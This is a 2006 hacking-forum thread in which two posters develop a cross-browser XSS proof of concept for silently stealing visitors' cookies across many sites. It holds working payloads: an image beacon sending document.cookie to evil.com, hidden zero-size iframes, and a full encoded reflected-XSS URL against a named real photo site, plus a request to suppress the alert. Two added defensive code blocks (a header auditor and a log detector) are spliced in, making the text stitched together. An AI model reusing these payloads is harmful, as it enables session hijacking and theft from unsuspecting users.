Sla.ckers.org
X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 02:58AM

Based on the idea by Jeremiah Grossman (with that excellent CSS find), and of course maluc, who gave me the multiple-XSS idea he suggested to work this X(C)SS thingy out.

X(C)SS Cross browser Exploit p0c
http://www.jungsonnstudios.com/cool.php

I've tested it on Firefox and MSIE;
in both versions it works on 2 platforms.

Note:
it should not work with all those crazy extensions you guys have installed :)
but a 'normal' surfer doesn't have them, so it has a pretty good chance. *_*

Love to hear your ideas/comments on it, and even suggestions for on my watch! ;)



Edited 1 time(s). Last edit at 12/12/2006 02:22PM by jungsonn.

Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 05:10AM

I don't think the xmlhttpreq part will work quite like you'd hope, but you're on the right track. Somewhere you're going to have to use iframes for each of the XSS links, and each of those iframes is going to have to include an image back to a logger:

'<img src="http://evil.com/cookie_monster.php?id=UNIQUE_ID&site='+location.host+'&cookie='+document.cookie+'">'

That, unfortunately, means we need a logger to handle 800 connections for each user we attack. Then your main exploit can ping 'http://evil.com/is_it_done.php?id=UNIQUE_ID&dontcache='+Math.random(); once a second until it returns a "Yes. they are: blah", assuming the main exploit is also run from evil.com.

And actually, I've thought of a completely headless way using JavaScript redirects, which I'll go ahead and make a PoC for. It's indeed limited by the 2-requests-at-a-time queue, but if we put all the variables after the hash (#), caching should make it really fast. Again, it needs iframes, not XHR.

Edit: but if you can think of a way using XHR, I'm interested to see that working, or the code that cookie_monster.php would use..

-maluc



Edited 1 time(s). Last edit at 12/12/2006 05:12AM by maluc.

Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 06:24AM

Yes, I did not fully test it. I also thought of iframes: on each found site I generate a little 1px iframe, but I didn't have the time to put it in yet.
Also with the XMLHttpRequest, I thought about implementing a timeout or a simple sleep. I'm not sure yet. The image idea is nice; it's also faster than XHR.
I'm going to make a real-world example, otherwise it's just a piece of code :)
Thanks Maluc!

Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 06:35AM

Rather than make them 1 pixel, make them take up no space with "position: absolute" and invisible with "visibility: hidden", although I usually make their height/width zero for good measure. Except when using the QuickTime XSS in IE (it won't execute if the window is zero for some reason).

so: <iframe src="xsslink" style="height: 0; width: 0; position: absolute; visibility: hidden"></iframe>

Even 800 of those should not affect the layout more than one <br />.

Important though: use createElement('iframe') if you want it usable in IE7. It seems to freak out if you dynamically generate a bunch of iframes with innerHTML, as I posted here: http://sla.ckers.org/forum/read.php?3,2382,2382#msg-2382

Sadly, no one was interested.. but at least the info comes in handy now ^^

-maluc

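Seen from the side of a site owner, the hidden-iframe harness above depends on two things the target site controls: that its pages agree to render inside a frame on a foreign origin, and that its session cookie is readable from document.cookie. The following is an added example (not code from this thread or from either poster) that parses a server's response headers and reports both properties. It assumes the headers are supplied as a plain object with lower-cased names and Set-Cookie as an array, as Node's http module delivers them; the two header sets at the bottom are constructed samples.

```javascript
// Added example (not from the thread): audit response headers for the two
// controls that break the hidden-iframe + document.cookie beacon described
// above. Header values below are constructed samples, not captured traffic.

// Parse one Set-Cookie header into { name, attrs }; attribute names lower-cased,
// bare attributes such as HttpOnly or Secure become `true`.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrParts] = parts;
  const name = nameValue.split('=')[0].trim();
  const attrs = {};
  for (const a of attrParts) {
    const [k, v] = a.split('=');
    attrs[k.trim().toLowerCase()] = v === undefined ? true : v.trim();
  }
  return { name, attrs };
}

// Parse a Content-Security-Policy header into a map directive -> source list.
function parseCsp(header) {
  const directives = {};
  for (const d of header.split(';')) {
    const tokens = d.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Does the response forbid being rendered inside a frame on a foreign origin?
// Either X-Frame-Options DENY/SAMEORIGIN or a frame-ancestors directive that
// names only 'none' or 'self' counts; any other ancestor source is treated as
// allowing some third party.
function blocksCrossOriginFraming(headers) {
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return true;
  const csp = headers['content-security-policy'];
  if (!csp) return false;
  const ancestors = parseCsp(csp)['frame-ancestors'];
  if (!ancestors) return false;
  return ancestors.every((s) => s === "'none'" || s === "'self'");
}

// Names of cookies that page script (and so document.cookie) can still read,
// i.e. those set without the HttpOnly attribute.
function scriptReadableCookies(headers) {
  const raw = headers['set-cookie'] || [];
  const list = Array.isArray(raw) ? raw : [raw];
  return list.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

function auditResponse(headers) {
  const exposed = scriptReadableCookies(headers);
  return {
    framingBlocked: blocksCrossOriginFraming(headers),
    scriptReadableCookies: exposed,
    cookieBeaconPossible: exposed.length > 0,
  };
}

// Constructed samples: a weak configuration and a hardened one. Note that the
// hardened set still leaves the non-session "theme" cookie readable, because
// HttpOnly protects only the cookies it is set on.
const WEAK = {
  'set-cookie': ['PHPSESSID=abc123; path=/', 'theme=dark; path=/'],
};
const HARDENED = {
  'set-cookie': ['PHPSESSID=abc123; path=/; Secure; HttpOnly; SameSite=Lax', 'theme=dark; path=/'],
  'content-security-policy': "default-src 'self'; frame-ancestors 'none'",
};

console.log('weak:', auditResponse(WEAK));
console.log('hardened:', auditResponse(HARDENED));
```

The audit is deliberately strict about frame-ancestors: a policy that lists a partner origin is reported as not blocking framing, because the question being asked is whether any foreign page can host the frame, not whether most can.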
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 07:20AM

I've got an example up with the image idea, not sure though. A little tired by now. If you notice something wrong, please let me know.

*_*

Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 07:26AM

Oh, and:

Now find a way to get rid of the alert XSS thingy,
because I want to grab the cookie without an alert, of course :)

Re: X(C)SS Cross browser Exploit p0c
Posted by: maluc
Date: December 12, 2006 09:03AM

Heh, by davinci-ish I meant intentionally putting errors into your work, to prevent novices from stealing it. Leonardo da Vinci did it a lot in his designs, so they couldn't be stolen and built from. Like the tank he designed with the wheels rolling against each other, so it would never move.

And I don't think your sndReq() half will work as described. First off, each one will need its own request object. Second, pages you get with XMLHTTP aren't executed; you only download the source. So where is the user visiting the XSS link and sending the cookies?

By adding the image link i meant for example:

This XSS:
htp://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

We put this into our exploit code:
<script>
exploit = '"><script defer>document.body.innerHTML = "<img src=%27http:\/\/evil.com/stealer.php'
          + '?site=bigstockphoto%26cookie=" %2B document.cookie %2B "%27>"<\/script>';
document.body.innerHTML += "<iframe src='http://www.bigstockphoto.com/search.php?photo_name=" + exploit + "'></iframe>"
</script>

So when http://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%20defer%3Edocument.body.innerHTML%20=%20%22%3Cimg%20src=%27http://evil.com/stealer.php?site=bigstockphoto%26cookie=%22%20%2B%20document.cookie%20%2B%20%22%27%3E%22%3C/script%3E is loaded in that iframe on our exploit page, it opens an image to the cookie stealer, with the cookies of that page (bigstockphoto.com). It uses an iframe; you can't really implement it with XMLHTTP..

-maluc

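The exchange above leaves two artefacts a defender can look for: on the targeted site's own access log, a query parameter that decodes to a script tag and a document.cookie reference; on an outbound proxy log, a request to a third-party host carrying a cookie pair in its query string. The detector below is an added example, not code from this thread or from either poster. The log lines are constructed samples in combined log format using the reserved .invalid domain; decoding is a simplified form-decoding (plus-to-space, then repeated percent-decoding) so that double-encoded payloads are caught too.

```javascript
// Added example (not from the thread): scan access/proxy log lines for a
// reflected-XSS payload in a parameter and for a cookie value being sent to
// a third-party URL. All log lines, hosts and paths are constructed samples.

// Simplified form decoding: '+' to space once, then percent-decode repeatedly
// (bounded) so "%2522%253E" is seen as '">' just as "%22%3E" is.
function fullyDecode(s) {
  let prev = null;
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur); } catch (e) { break; } // malformed %xx: stop here
  }
  return cur;
}

// Markers of a reflected-XSS probe or payload inside a parameter value.
const PAYLOAD_MARKERS = [
  /<\s*script\b/i,
  /document\.cookie/i,
  /\bon(load|error|click|mouseover)\s*=/i,
  /javascript:/i,
];

// Parse a combined-log-format line into client, time, method, path and
// decoded [key, value] query parameters. Returns null for unparseable lines.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return null;
  const [, client, time, method, target, status] = m;
  const qi = target.indexOf('?');
  const path = qi < 0 ? target : target.slice(0, qi);
  const query = qi < 0 ? '' : target.slice(qi + 1);
  const params = [];
  for (const pair of query.split('&').filter(Boolean)) {
    const eq = pair.indexOf('=');
    const k = eq < 0 ? pair : pair.slice(0, eq);
    const v = eq < 0 ? '' : pair.slice(eq + 1);
    params.push([fullyDecode(k), fullyDecode(v)]);
  }
  return { client, time, method, path, params, status: Number(status) };
}

// Apply the two rules to one parsed entry.
function classify(entry) {
  const findings = [];
  for (const [k, v] of entry.params) {
    if (PAYLOAD_MARKERS.some((re) => re.test(v))) {
      findings.push({ rule: 'reflected_payload', param: k });
      break; // one finding per request is enough
    }
  }
  for (const [k, v] of entry.params) {
    // a parameter literally named "cookie" whose value looks like name=value
    if (k.toLowerCase() === 'cookie' && /^\w+=\S+/.test(v)) {
      findings.push({ rule: 'cookie_exfil', param: k, path: entry.path });
    }
  }
  return findings;
}

function scanLogLines(lines) {
  const results = [];
  lines.forEach((line, i) => {
    const entry = parseLogLine(line);
    if (!entry) return;
    for (const f of classify(entry)) results.push({ line: i, client: entry.client, ...f });
  });
  return results;
}

// Constructed sample log (not real traffic).
const SAMPLE_LOG = [
  // victim site: parameter decodes to a script tag that beacons document.cookie
  '203.0.113.5 - - [12/Dec/2006:09:03:00 +0000] "GET /search.php?photo_name=%22%3E%3Cscript%20defer%3Edocument.body.innerHTML%20=%20%22%3Cimg%20src=%27http://attacker.invalid/stealer.php?site=x%26cookie=%22%20%2B%20document.cookie%20%2B%20%22%27%3E%22%3C/script%3E HTTP/1.1" 200 5120',
  // same site, double-encoded probe
  '203.0.113.5 - - [12/Dec/2006:09:03:02 +0000] "GET /search.php?photo_name=%2522%253E%253Cscript%253E HTTP/1.1" 200 5120',
  // benign search
  '198.51.100.7 - - [12/Dec/2006:09:04:00 +0000] "GET /search.php?photo_name=sunset+beach HTTP/1.1" 200 4096',
  // proxy log: a browser sends a cookie pair to a third-party host
  '10.0.0.23 - - [12/Dec/2006:09:03:01 +0000] "GET http://attacker.invalid/stealer.php?site=x&cookie=PHPSESSID%3Dabc123 HTTP/1.1" 200 43',
];

for (const f of scanLogLines(SAMPLE_LOG)) console.log(f);
```

The first rule fires on the site that carries the injection; the second fires at the network edge, where the beacon becomes visible even if the injected page was never logged. Both are string heuristics and will need tuning against a real site's own parameter names.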
Re: X(C)SS Cross browser Exploit p0c
Posted by: jungsonn
Date: December 12, 2006 02:16PM

Thanks Maluc! Saved a lot of time for me, and the headaches. I've updated the script a little towards your approach.

Maluc said: "So where is the user visiting the xss link and sending the cookies?"

Yes, the XHR was only an example; I would have used iframes or hidden layers to accomplish a good result. Forgive me for that, I was too tired to put one up :)

Still, I'm going to figure out how to do it with the XHR silently;
it must be possible.
